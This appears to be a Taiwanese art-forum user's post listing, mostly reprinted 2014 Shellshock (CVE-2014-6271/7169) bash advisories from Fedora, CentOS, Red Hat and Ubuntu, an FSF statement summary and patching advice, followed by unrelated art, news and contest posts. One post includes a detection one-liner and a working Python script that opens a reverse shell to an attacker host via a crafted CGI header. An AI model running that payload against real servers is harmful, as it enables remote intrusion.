首頁 美術繪圖 | 美術設計 | 熱門標籤 | 首選 | 首頁宣傳 | 近期作品 論壇: 發表 | 美術工作 | 美術比賽 | 展覽活動 | 美術相關 | 一般討論 | 美術同好 CG 討論 :: Photoshop | Painter | 3D 行動 | AMP

【 立即註冊 】 : 更改個人資料 : : 登入

會員名稱: 登入密碼: 保持登入
Type(Type) 所有的發表文章

前往頁面 ←上一頁  1 ... 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 ... 558  下一頁→

[h1]Fedora Bash Update: Fedora 19, Fedora 20[/h1]

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
Date: Fri, 26 Sep 2014 09:00:48 +0000
Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11514
2014-09-26 08:10:17
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 19
Version : 4.2.48
Release : 2.fc19
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Inhibit code injection - patch by Stephane Chazelas
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
Date: Fri, 26 Sep 2014 09:03:00 +0000
Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11527
2014-09-26 08:10:45
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 20
Version : 4.2.48
Release : 2.fc20
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4
- Inhibit code injection - patch by Stephane Chazelas
* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3
- Mention ulimit -c and -f block size in POSIX mode
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Proper patchlevel 47
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

[h1]CentOS 5 / CentOS 6 / CentOS 7[/h1]
From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update
Date: Fri, 26 Sep 2014 02:16:02 +0000
Message-ID: <20140926021602.GA3213@chakra.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7 bash-3.2-33.el5_10.4.i386.rpm

x86_64:
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpm

Source:
b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da bash-3.2-33.el5_10.4.src.rpm



--
Johnny Hughes
CentOS Project { http://www.centos.org/ }
irc: hughesjr, #centos@irc.freenode.net


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update
Date: Fri, 26 Sep 2014 02:24:20 +0000
Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab bash-4.1.2-15.el6_5.2.i686.rpm
333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4a
bash-4.1.2-15.el6_5.2.x86_64.rpm
18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Source:
d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5 bash-4.1.2-15.el6_5.2.src.rpm

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update
Date: Fri, 26 Sep 2014 02:23:24 +0000
Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

x86_64:
d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36
bash-4.2.45-5.el7_0.4.x86_64.rpm
9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70e
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Source:
b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb bash-4.2.45-5.el7_0.4.src.rpm


[h1]Red Hat v5, Red Hat v6, Red Hat v7 BASH Update[/h1]

From: bugzilla@redhat.com
To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com
Subject: [RHSA-2014:1306-01] Important: bash security update
Date: Fri, 26 Sep 2014 02:02:30 +0000
Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
Red Hat Security Advisory

Synopsis: Important: bash security update
Advisory ID: RHSA-2014:1306-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1306.html

Issue date: 2014-09-26
CVE Names: CVE-2014-7169
=====================================================================

1. Summary:

Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

Applications which directly create bash functions as environment variables
need to be made aware of changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223


Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.

For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.

All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258


5. Bugs fixed ( https://bugzilla.redhat.com/):

1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for
CVE-2014-6271)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

ia64:
bash-3.2-33.el5_11.4.i386.rpm
bash-3.2-33.el5_11.4.ia64.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.ia64.rpm

ppc:
bash-3.2-33.el5_11.4.ppc.rpm
bash-debuginfo-3.2-33.el5_11.4.ppc.rpm

s390x:
bash-3.2-33.el5_11.4.s390x.rpm
bash-debuginfo-3.2-33.el5_11.4.s390x.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-4.1.2-15.el6_5.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-4.1.2-15.el6_5.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm
bash-doc-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm
bash-doc-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

ppc64:
bash-4.2.45-5.el7_0.4.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-4.2.45-5.el7_0.4.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm
bash-doc-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm
bash-doc-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
#package">https://access.redhat.com/security/team/key/#package


7. References:

https://www.redhat.com/security/data/cve/CVE-2014-7169.html

https://access.redhat.com/security/updates/classification...
https://access.redhat.com/articles/1200223


8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/


Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jt
wqMN2oFvaGhf5SqiZHqpyOA=
=Unt1
-----END PGP SIGNATURE-----


[h1]Ubuntu 10.04 / 12.04 / 14.04 BASH Update[/h1]
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-2363-1] Bash vulnerability
Date: Thu, 25 Sep 2014 18:35:21 -0400
Message-ID: <542498A9.6020900@canonical.com>
==========================================================================
Ubuntu Security Notice USN-2363-1
September 25, 2014

bash vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

Bash allowed bypassing environment restrictions in certain environments.

Software Description:
- bash: GNU Bourne Again SHell

Details:

Tavis Ormandy discovered that the security fix for Bash included in
USN-2362-1 was incomplete. An attacker could use this issue to bypass
certain environment restrictions. (CVE-2014-7169)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.2

Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.3

Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.2

In general, a standard system update will make all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-2363-1

CVE-2014-7169

Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2

https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3

https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2(2014-09-27 13:41)

[h1]自由軟體基金會對於 GNU Bash "ShellShock" 發表的聲明[/h1]

原文: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

快速翻譯摘要如下:

1. 一個重大的 Bash 安全性問題被發現於 GNU Bash,目前已經有暫時解法;而完整的解法正在動工中。
所有使用 bash 的系統應該立即進行更新,並且監視 bash 相關的網路服務。

2. 此 Bug 俗稱為 "ShellShock",在某些特定狀況下,可以讓攻擊者取得 root 權限,不論是直接透過 bash
或者 call path 中有 bash 的(網路)應用。
可參考: NVD
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169

3. 因為 GNU Bash 為自由軟體且可靠好用,所以 ShellShock 影響範圍廣泛
所幸的是是因為他是 GPL V3,所以能讓自由軟體開發者如
Red Hat 快速的回應此 bug 並分享出 patch 讓各大上游開發者能夠同步修復。

4. 每個人都可以同時自由的下載、檢視、補綴自己的 bash,
不像是微軟(Microsoft) 或者蘋果(Apple),或者其他的私有軟體。

(這篇文章還順便酸了 Microsoft & Apple 一把,不曉得 FSF 官方聲明為什麼一定要這樣...)

5. 軟體自由是安全的大前提之一,保證每個人都可以檢視並偵測自己使用程式碼的安全性,
進而改善、製造更安全的軟體。

6. 不管是自由軟體或者私有軟體,都不保證 Bug-Free;Bug 會發生,與他的「授權方式」完全無關。
然而如果是在自由軟體發現的 bug ,每個人都有權限、權力、原始代碼來進行複製與修復;
接著此 patch 很快會廣為自由免費的散佈至每個人手上。
這種自由度對於安全運算事關重大。

7. 私有軟體(非自由軟體)依賴於一個「不平等(unjust)」的開發模式,
他隱藏了原始碼,並剝奪了使用者的基本權力;這樣不僅僅讓安全缺失難以發現,
並且容易讓這些開發商故意殖入可能有害的內容,並隱藏已經發現的嚴重問題。

有報告指出,微軟曾經提供給政府的情報組織一些尚未修復的漏洞資訊。
( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/

8. 自由軟體並不能保證你的安全,某些狀況下,有可能比起私有軟體更顯得容易發現漏洞。
但比起「不容易發現的漏洞」,持續的監督、改善自由軟體,才是重點。

9. BASH 和其他 GNU 軟體的開發,大部分都是由義務組織或個人義務來貢獻他們才智時間;
我們正在檢視 Bash 的開發,並看增進對於 bash 計畫的資金贊助是否能夠避免未來發生類似問題;
如果您或您的單位組織,有使用 bash 並對於支援 bash 有興趣,請聯絡我們 ( http://www.fsf.org/news/donate@fsf.org


自由軟體基金會媒體窗口 John Sullivan Executive Director
Free Software Foundation +1 (617) 542 5942 campaigns@fsf.org





(2014-09-27 11:56)

[h1]Bash Security Bugs: 2014 九月底發現,請儘速更新修補

(尤其是有 CGI-BIN bash 服務的 server[/h1]

簡稱:ShellShock (當然,給他一個和 HeartBleed一樣的名字)

ShellSHock 影響: All Unix/Linux/BSD/MacOS/Windows 有用 bash 都會受到影響


ShellShock BASH 影響版本:
=> bash 1.14 ~ bash 4.3 (幾乎接近是 zero-day bug)


參考:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/666

修補很簡單:
@ Ubuntu / Debian
$ apt-get update;apt-get upgrade
$ apt-get update && sudo apt-get install --only-upgrade bash (單純更新 bash)

@ Fedora/CentOS/Fedora
$ yum update
$ yum update bash (只更新 bash)

當然,「安全」的前提是,還沒被用此漏洞入侵。


漏洞可能影響的 scenario
1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts
2. 特定的 DHCP clients
3. OpenSSH server 使用 "ForeceCommand 參數"
4. 相關網路服務,其 path 中有使用到未 patch 的 bash




Q: 如何偵測?

最簡單的 Sample Code,如下面這一行,如果你會看 "vulnerable" 被印出來,
然後才看到 this is a test
那就代表 bash 有 security bug

代碼:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


[hr]
Example Code #2:
代碼:

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
   print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
   print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
   exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
   "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data



Example Code #3:
代碼:

$ gcc bug.c
$ env TERM='() { :;}; echo vulnerable' a.out
vulnerable
#include <stdlib.h>

int main(void)
{
    return system("cat bug.c");
}



Update your Ubuntu/Redhat/Fedora/Debian
代碼:

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash

$ apt-get update

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  linux-image-virtual
The following packages will be upgraded:
  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12
  libdbus-1-3 libnss3 libnss3-1d
10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 5,421 kB of archives.
After this operation, 10.2 kB of additional disk space will be used.
Do you want to continue [Y/n]?


%  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash
(2014-09-26 13:16)

[h1] 2014/09 Adobe業績不彰撤出中國 僅留銷售單位 400名員工恐多數遭裁撤[/h1]

2014/09/25 18:25 鉅亨網 編譯李業德 綜合外電
=> 原文 http://xor.tw/+4w1k3

科技網站《ZDNet》周三 (24日) 報導,由於財務表現不彰,繪圖設計軟體製造商 Adobe Systems Inc. ( (US-ADBE) ) 宣布關閉中國市場總部,其 400 名員工恐怕大多數將遭到裁撤。

Adobe 的北京辦公室員工,於周三早上被召集到當地一間飯店,進行 15 分鐘的會談,期間被告知大多數人面對解聘的命運。

另一分報導指出,約 30 位員工將轉調至 Adobe 的美國和印度公司,中國市場內將僅留下銷售業務單位,而往後中國業務將交給印度分公司負責。

報導指出,公司員工被分為 5 組,並分別發給不同顏色的信封,以區別其最後一天留職的時間,拿到綠色信封的部門員工,會在 10 月底成為第一批離職群,紅色信封則是 12 月底。不過部份員工透露,他們離職時間的安排,係基於服務項目和月薪額度決定。

Adobe 於 9 月 17 日公開第三季財報,表示公司成長僅 1% 低於預期,且淨利下滑至 4470 萬美元,更是由去 (2013) 年同期大減 46%。

2012 年 12 月時,Adobe 宣布關閉台灣分公司,並將業務轉移到香港辦公室處理。(2014-09-25 19:02)

[center]擬人獸耳插畫[/center]
##DIV##
[center]
[h1]小說插畫、擬人獸耳插畫設計 - 白米熊 WRB's Fiction Cover Illustration[/h1]

left_to_their_world_by_whitericebear-d7bsfr1 留給他們的世界 - Their own high-land
湯圓 *湯圓* - Dumpling Swim suites
南極星的眼淚800 南極星的眼淚 - Tear Drops of Southern Stars
誘拐棕髮少女計畫 誘拐棕髮少女計畫 - Luring the Brown Hair Girl
毛線球 *毛線球* - Fur Ball Foxy
[hr]
More! shortpolarbear(WRB, 白米熊) Artworks:
http://vovo2000.com/paintbbs/art/shortpolarbear/
http://vovo2000.com/artist/shortpolarbear/tags/
http://vovo2000.com/artist/shortpolarbear/


[hr]
See Also
=> WRB(White-Rice-Bear's) Touhou Project Fan ARt



[hr]
See Also Related...
[url=http://vovo2000.com/tags/擬人/]
「擬人」相關創作 :: "Game Design" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/小說/]
「小說插畫」相關創作 :: "Fictions Cover" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/獸耳/]
「獸耳」相關創作 :: "Animal Ears" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/熊/]
「熊」創作 :: "Bear" Artworks Illustration/Fine Art/Art Pieces

[/url]

[/center](2014-09-23 22:37)

[h1]網站截圖 Some more Web pages captures update 2014[/h1]

[h2]http://www.shrinktheweb.com/[/h2]

1. Amazon Alexa 2009 停止後,開始使用 ShrinktheWeb basic account,用起來不錯,
但是常超過上限,而且不能 Access Inner page,只能抓 Top page。

e.g. 舉例
example.com/album/helloworld.html
基本帳戶,只能抓到 http://example.com/ 的首頁
如果要抓 Inner Page,則每個月要花到 $15 USD (5+10 USD)


=> http://www.shrinktheweb.com/




[h2]Hybrid: CutyCapt + PicoShot + Webthumbnail [/h2]

2. 2012 之後則是混合下列使用來進行「網站截圖」

(a) CutyCapt
=> 有寫一篇教學在此 http://xor.tw/+4wdt0

(b) PicoShot (Shrinktheweb 子公司, $5 USD/month) ,有免費/也有付費的方案!

=> http://picoshot.com/ (買的人很少,Support 大概要三四天)

(c) Webthumbnail,(目前 2014)完全免費! 但免費的,代表沒有 Support

=> http://webthumbnail.org/

(2014-09-23 13:33)

[h1]2014 聯合文創設計獎 (總獎 123 萬, ~2014/11/09)[/h1]

參賽官網: http://designaward.udn.com/
線上報名: http://designaward.udn.com/



!!!注意!!! 這個比賽「參賽要收費! ($600 NTD)」


「聯合文創設計獎」為聯合報系正式投入文創產業,成立「有.設計uDesign」文創設計商品平台之後,以行動進一步提升台灣設計師品牌能見度與全方位行銷。
「聯合文創設計獎」以概念組及成品組分組競賽,挹注超過百萬獎金,及聯合報系平面、電視、網路平台資源,整合電子商務、策展、宣傳力量,協助得獎者全方位發展規劃,為台灣文創產業打造完整產業鏈,持續產生正向的產業循環。

[h2]一、競賽資格[/h2]

1.凡設籍中華民國、對產品設計有興趣者皆可參賽,不限個人或團體。
* 產品設計:指可供量產之工業產品設計,包含一般與數位應用、交通工具設計、設備儀器設計、生活及家居用品設計、資通訊及家電產品設計及其他類等。
2.以團隊方式報名者,報名時需填寫一團隊代表人,主辦單位發送之通知及獎金之發放等,均以此人為送達代收者。
3.賽作品須為作者原創。

[h2]二、競賽分組[/h2]

